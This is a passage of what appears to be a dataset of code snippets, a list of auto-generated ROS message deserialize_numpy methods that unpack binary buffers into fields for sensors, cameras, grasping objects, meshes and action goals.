_get_struct_2i3did19i3did21i3did7i3did7i4di().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 32\n (_x.distance_front, _x.angle_front, _x.distance_back, _x.angle_back, _x.turn_left,) = _struct_didid.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.turn_left_sensor = str[start:end]\n start = end\n end += 8\n (self.turn_right,) = _struct_d.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.turn_right_sensor = str[start:end]\n return self\n except struct.error as e:\n raise roslib.message.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg._Header.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 51\n (_x.temp_1_curr, _x.temp_1_min, _x.temp_1_max, _x.temp_2_curr, _x.temp_2_min, _x.temp_2_max, _x.temp_3_curr, _x.temp_3_min, _x.temp_3_max, _x.temp_4_curr, _x.temp_4_min, _x.temp_4_max, _x.temp_5_curr, _x.temp_5_min, _x.temp_5_max, _x.temp_6_curr, _x.temp_6_min, _x.temp_6_max, _x.akku_voltage_curr, _x.akku_voltage_min, _x.akku_voltage_max, _x.hals_motor_voltage_curr, _x.hals_motor_voltage_min, _x.hals_motor_voltage_max, _x.hals_logik_voltage_curr, _x.hals_logik_voltage_min, _x.hals_logik_voltage_max, _x.tablett_logik_voltage_curr, _x.tablett_logik_voltage_min, _x.tablett_logik_voltage_max, _x.arm_logik_voltage_curr, _x.arm_logik_voltage_min, _x.arm_logik_voltage_max, _x.tablett_motor_voltage_curr, _x.tablett_motor_voltage_min, _x.tablett_motor_voltage_max, _x.hals_motor_current_curr, _x.hals_motor_current_min, _x.hals_motor_current_max, _x.hals_logik_current_curr, _x.hals_logik_current_min, _x.hals_logik_current_max, _x.tablett_logik_current_curr, _x.tablett_logik_current_min, _x.tablett_logik_current_max, _x.arm_logik_current_curr, _x.arm_logik_current_min, _x.arm_logik_current_max, _x.tablett_motor_current_curr, _x.tablett_motor_current_min, _x.tablett_motor_current_max,) = _struct_51B.unpack(str[start:end])\n return self\n except struct.error, e:\n raise roslib.message.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n if python3:\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.graspable_objects is None:\n self.graspable_objects = None\n if self.image is None:\n self.image = sensor_msgs.msg.Image()\n if self.camera_info is None:\n self.camera_info = sensor_msgs.msg.CameraInfo()\n if self.meshes is None:\n self.meshes = None\n if self.reference_to_camera is None:\n self.reference_to_camera = geometry_msgs.msg.Pose()\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.graspable_objects = []\n for i in range(0, length):\n val1 = manipulation_msgs.msg.GraspableObject()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.reference_frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1.reference_frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.potential_models = []\n for i in range(0, length):\n val2 = household_objects_database_msgs.msg.DatabaseModelPose()\n start = end\n end += 4\n (val2.model_id,) = _get_struct_i().unpack(str[start:end])\n _v94 = val2.type\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v94.key = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v94.key = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v94.db = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v94.db = str[start:end]\n _v95 = val2.pose\n _v96 = _v95.header\n start = end\n end += 4\n (_v96.seq,) = _get_struct_I().unpack(str[start:end])\n _v97 = _v96.stamp\n _x = _v97\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v96.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v96.frame_id = str[start:end]\n _v98 = _v95.pose\n _v99 = _v98.position\n _x = _v99\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n _v100 = _v98.orientation\n _x = _v100\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 4\n (val2.confidence,) = _get_struct_f().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.detector_name = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val2.detector_name = str[start:end]\n val1.potential_models.append(val2)\n _v101 = val1.cluster\n _v102 = _v101.header\n start = end\n end += 4\n (_v102.seq,) = _get_struct_I().unpack(str[start:end])\n _v103 = _v102.stamp\n _x = _v103\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v102.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v102.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n _v101.points = []\n for i in range(0, length):\n val3 = geometry_msgs.msg.Point32()\n _x = val3\n start = end\n end += 12\n (_x.x, _x.y, _x.z,) = _get_struct_3f().unpack(str[start:end])\n _v101.points.append(val3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n _v101.channels = []\n for i in range(0, length):\n val3 = sensor_msgs.msg.ChannelFloat32()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.name = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val3.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n val3.values = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=length)\n _v101.channels.append(val3)\n _v104 = val1.region\n _v105 = _v104.cloud\n _v106 = _v105.header\n start = end\n end += 4\n (_v106.seq,) = _get_struct_I().unpack(str[start:end])\n _v107 = _v106.stamp\n _x = _v107\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v106.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v106.frame_id = str[start:end]\n _x = _v105\n start = end\n end += 8\n (_x.height, _x.width,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n _v105.fields = []\n for i in range(0, length):\n val4 = sensor_msgs.msg.PointField()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val4.name = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val4.name = str[start:end]\n _x = val4\n start = end\n end += 9\n (_x.offset, _x.datatype, _x.count,) = _get_struct_IBI().unpack(str[start:end])\n _v105.fields.append(val4)\n _x = _v105\n start = end\n end += 9\n (_x.is_bigendian, _x.point_step, _x.row_step,) = _get_struct_B2I().unpack(str[start:end])\n _v105.is_bigendian = bool(_v105.is_bigendian)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n _v105.data = str[start:end]\n start = end\n end += 1\n (_v105.is_dense,) = _get_struct_B().unpack(str[start:end])\n _v105.is_dense = bool(_v105.is_dense)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%si'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n _v104.mask = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)\n _v108 = _v104.image\n _v109 = _v108.header\n start = end\n end += 4\n (_v109.seq,) = _get_struct_I().unpack(str[start:end])\n _v110 = _v109.stamp\n _x = _v110\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v109.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v109.frame_id = str[start:end]\n _x = _v108\n start = end\n end += 8\n (_x.height, _x.width,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v108.encoding = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v108.encoding = str[start:end]\n _x = _v108\n start = end\n end += 5\n (_x.is_bigendian, _x.step,) = _get_struct_BI().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n _v108.data = str[start:end]\n _v111 = _v104.disparity_image\n _v112 = _v111.header\n start = end\n end += 4\n (_v112.seq,) = _get_struct_I().unpack(str[start:end])\n _v113 = _v112.stamp\n _x = _v113\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v112.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v112.frame_id = str[start:end]\n _x = _v111\n start = end\n end += 8\n (_x.height, _x.width,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v111.encoding = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v111.encoding = str[start:end]\n _x = _v111\n start = end\n end += 5\n (_x.is_bigendian, _x.step,) = _get_struct_BI().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n _v111.data = str[start:end]\n _v114 = _v104.cam_info\n _v115 = _v114.header\n start = end\n end += 4\n (_v115.seq,) = _get_struct_I().unpack(str[start:end])\n _v116 = _v115.stamp\n _x = _v116\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v115.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v115.frame_id = str[start:end]\n _x = _v114\n start = end\n end += 8\n (_x.height, _x.width,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v114.distortion_model = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v114.distortion_model = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n _v114.D = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 72\n _v114.K = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=9)\n start = end\n end += 72\n _v114.R = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=9)\n start = end\n end += 96\n _v114.P = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=12)\n _x = _v114\n start = end\n end += 8\n (_x.binning_x, _x.binning_y,) = _get_struct_2I().unpack(str[start:end])\n _v117 = _v114.roi\n _x = _v117\n start = end\n end += 17\n (_x.x_offset, _x.y_offset, _x.height, _x.width, _x.do_rectify,) = _get_struct_4IB().unpack(str[start:end])\n _v117.do_rectify = bool(_v117.do_rectify)\n _v118 = _v104.roi_box_pose\n _v119 = _v118.header\n start = end\n end += 4\n (_v119.seq,) = _get_struct_I().unpack(str[start:end])\n _v120 = _v119.stamp\n _x = _v120\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v119.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n _v119.frame_id = str[start:end]\n _v121 = _v118.pose\n _v122 = _v121.position\n _x = _v122\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n _v123 = _v121.orientation\n _x = _v123\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])\n _v124 = _v104.roi_box_dims\n _x = _v124\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.collision_name = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1.collision_name = str[start:end]\n self.graspable_objects.append(val1)\n _x = self\n start = end\n end += 12\n (_x.image.header.seq, _x.image.header.stamp.secs, _x.image.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.image.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.image.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 8\n (_x.image.height, _x.image.width,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.image.encoding = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.image.encoding = str[start:end]\n _x = self\n start = end\n end += 5\n (_x.image.is_bigendian, _x.image.step,) = _get_struct_BI().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.image.data = str[start:end]\n _x = self\n start = end\n end += 12\n (_x.camera_info.header.seq, _x.camera_info.header.stamp.secs, _x.camera_info.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera_info.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.camera_info.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 8\n (_x.camera_info.height, _x.camera_info.width,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera_info.distortion_model = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.camera_info.distortion_model = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n self.camera_info.D = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 72\n self.camera_info.K = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=9)\n start = end\n end += 72\n self.camera_info.R = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=9)\n start = end\n end += 96\n self.camera_info.P = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=12)\n _x = self\n start = end\n end += 25\n (_x.camera_info.binning_x, _x.camera_info.binning_y, _x.camera_info.roi.x_offset, _x.camera_info.roi.y_offset, _x.camera_info.roi.height, _x.camera_info.roi.width, _x.camera_info.roi.do_rectify,) = _get_struct_6IB().unpack(str[start:end])\n self.camera_info.roi.do_rectify = bool(self.camera_info.roi.do_rectify)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.meshes = []\n for i in range(0, length):\n val1 = shape_msgs.msg.Mesh()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.triangles = []\n for i in range(0, length):\n val2 = shape_msgs.msg.MeshTriangle()\n start = end\n end += 12\n val2.vertex_indices = numpy.frombuffer(str[start:end], dtype=numpy.uint32, count=3)\n val1.triangles.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.vertices = []\n for i in range(0, length):\n val2 = geometry_msgs.msg.Point()\n _x = val2\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n val1.vertices.append(val2)\n self.meshes.append(val1)\n _x = self\n start = end\n end += 56\n (_x.reference_to_camera.position.x, _x.reference_to_camera.position.y, _x.reference_to_camera.position.z, _x.reference_to_camera.orientation.x, _x.reference_to_camera.orientation.y, _x.reference_to_camera.orientation.z, _x.reference_to_camera.orientation.w,) = _get_struct_7d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.Class = str[start:end].decode('utf-8')\n else:\n self.Class = str[start:end]\n _x = self\n start = end\n end += 40\n (_x.probability, _x.xmin, _x.ymin, _x.xmax, _x.ymax,) = _get_struct_d4q().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.p1 is None:\n self.p1 = geometry_msgs.msg.PointStamped()\n if self.p2 is None:\n self.p2 = geometry_msgs.msg.PointStamped()\n if self.p3 is None:\n self.p3 = geometry_msgs.msg.PointStamped()\n if self.p4 is None:\n self.p4 = geometry_msgs.msg.PointStamped()\n end = 0\n _x = self\n start = end\n end += 16\n (_x.s1, _x.s2, _x.s3, _x.s4, _x.p1.header.seq, _x.p1.header.stamp.secs, _x.p1.header.stamp.nsecs,) = _struct_4B3I.unpack(str[start:end])\n self.s1 = bool(self.s1)\n self.s2 = bool(self.s2)\n self.s3 = bool(self.s3)\n self.s4 = bool(self.s4)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.p1.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.p1.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 36\n (_x.p1.point.x, _x.p1.point.y, _x.p1.point.z, _x.p2.header.seq, _x.p2.header.stamp.secs, _x.p2.header.stamp.nsecs,) = _struct_3d3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.p2.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.p2.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 36\n (_x.p2.point.x, _x.p2.point.y, _x.p2.point.z, _x.p3.header.seq, _x.p3.header.stamp.secs, _x.p3.header.stamp.nsecs,) = _struct_3d3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.p3.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.p3.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 36\n (_x.p3.point.x, _x.p3.point.y, _x.p3.point.z, _x.p4.header.seq, _x.p4.header.stamp.secs, _x.p4.header.stamp.nsecs,) = _struct_3d3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.p4.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.p4.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 24\n (_x.p4.point.x, _x.p4.point.y, _x.p4.point.z,) = _struct_3d.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 69\n (_x.Timestamp_sec, _x.Timestamp_nsec, _x.IdModulo, _x.InputVolA, _x.InputVolB, _x.InputCorrA, _x.InputCorrB, _x.OutputAnlg1, _x.OutputAnlg2, _x.InputDig1, _x.InputDig2, _x.InputDig3, _x.InputDig4, _x.OutputDig1, _x.OutputDig2, _x.OutputDig3, _x.OutputDig4, _x.OutputDig5, _x.OutputDig6, _x.OutputDig7, _x.OutputDig8,) = _get_struct_2ib6d12B().unpack(str[start:end])\n self.InputDig1 = bool(self.InputDig1)\n self.InputDig2 = bool(self.InputDig2)\n self.InputDig3 = bool(self.InputDig3)\n self.InputDig4 = bool(self.InputDig4)\n self.OutputDig1 = bool(self.OutputDig1)\n self.OutputDig2 = bool(self.OutputDig2)\n self.OutputDig3 = bool(self.OutputDig3)\n self.OutputDig4 = bool(self.OutputDig4)\n self.OutputDig5 = bool(self.OutputDig5)\n self.OutputDig6 = bool(self.OutputDig6)\n self.OutputDig7 = bool(self.OutputDig7)\n self.OutputDig8 = bool(self.OutputDig8)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 40\n (_x.h_min, _x.h_max, _x.s_min, _x.s_max, _x.v_min, _x.v_max,) = _get_struct_2I4d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.pan is None:\n self.pan = movo_msgs.msg.PanTiltActuatorFdbk()\n if self.tilt is None:\n self.tilt = movo_msgs.msg.PanTiltActuatorFdbk()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 12\n (_x.pan.header.seq, _x.pan.header.stamp.secs, _x.pan.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.pan.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.pan.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 64\n (_x.pan.current, _x.pan.pos_rad, _x.pan.vel_rps, _x.pan.torque_nm, _x.pan.pwm, _x.pan.encoder_rad, _x.pan.accel.x, _x.pan.accel.y, _x.pan.accel.z, _x.pan.temperature_degC, _x.tilt.header.seq, _x.tilt.header.stamp.secs, _x.tilt.header.stamp.nsecs,) = _struct_6f3df3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.tilt.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.tilt.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 52\n (_x.tilt.current, _x.tilt.pos_rad, _x.tilt.vel_rps, _x.tilt.torque_nm, _x.tilt.pwm, _x.tilt.encoder_rad, _x.tilt.accel.x, _x.tilt.accel.y, _x.tilt.accel.z, _x.tilt.temperature_degC,) = _struct_6f3df.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.object1 = str[start:end].decode('utf-8')\n else:\n self.object1 = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.object2 = str[start:end].decode('utf-8')\n else:\n self.object2 = str[start:end]\n _x = self\n start = end\n end += 12\n (_x.penetration_distance, _x.operation,) = _struct_di.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 4\n (self.numberOfTSPTurtles,) = _get_struct_i().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.des_gripper_pose is None:\n self.des_gripper_pose = geometry_msgs.msg.PoseStamped()\n if self.object_pose is None:\n self.object_pose = geometry_msgs.msg.PoseStamped()\n end = 0\n _x = self\n start = end\n end += 20\n (_x.manip_return_code, _x.object_grabber_return_code, _x.des_gripper_pose.header.seq, _x.des_gripper_pose.header.stamp.secs, _x.des_gripper_pose.header.stamp.nsecs,) = _get_struct_2i3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.des_gripper_pose.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.des_gripper_pose.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 72\n (_x.des_gripper_pose.pose.position.x, _x.des_gripper_pose.pose.position.y, _x.des_gripper_pose.pose.position.z, _x.des_gripper_pose.pose.orientation.x, _x.des_gripper_pose.pose.orientation.y, _x.des_gripper_pose.pose.orientation.z, _x.des_gripper_pose.pose.orientation.w, _x.object_finder_return_code, _x.object_pose.header.seq, _x.object_pose.header.stamp.secs, _x.object_pose.header.stamp.nsecs,) = _get_struct_7di3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.object_pose.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.object_pose.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 56\n (_x.object_pose.pose.position.x, _x.object_pose.pose.position.y, _x.object_pose.pose.position.z, _x.object_pose.pose.orientation.x, _x.object_pose.pose.orientation.y, _x.object_pose.pose.orientation.z, _x.object_pose.pose.orientation.w,) = _get_struct_7d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.polygons is None:\n self.polygons = None\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.polygons = []\n for i in range(0, length):\n val1 = cob_3d_mapping_msgs.msg.CurvedPolygon()\n _v4 = val1.stamp\n _x = _v4\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (val1.ID,) = _struct_I.unpack(str[start:end])\n start = end\n end += 24\n val1.parameter = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=6)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.score = []\n for i in range(0, length):\n val2 = cob_3d_mapping_msgs.msg.SimilarityScore()\n _x = val2\n start = end\n end += 8\n (_x.ID, _x.prob,) = _struct_If.unpack(str[start:end])\n val1.score.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.polyline = []\n for i in range(0, length):\n val2 = cob_3d_mapping_msgs.msg.PolylinePoint()\n _x = val2\n start = end\n end += 12\n (_x.x, _x.y, _x.edge_prob,) = _struct_3f.unpack(str[start:end])\n val1.polyline.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.features = []\n for i in range(0, length):\n val2 = cob_3d_mapping_msgs.msg.Feature()\n _x = val2\n start = end\n end += 16\n (_x.x, _x.y, _x.z, _x.ID,) = _struct_3fI.unpack(str[start:end])\n val1.features.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.energy = str[start:end].decode('utf-8')\n else:\n val1.energy = str[start:end]\n start = end\n end += 4\n (val1.weight,) = _struct_f.unpack(str[start:end])\n self.polygons.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.goal_id is None:\n self.goal_id = actionlib_msgs.msg.GoalID()\n if self.goal is None:\n self.goal = coordinator.msg.ManipTaskGoal()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 8\n (_x.goal_id.stamp.secs, _x.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.goal_id.id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.goal_id.id = 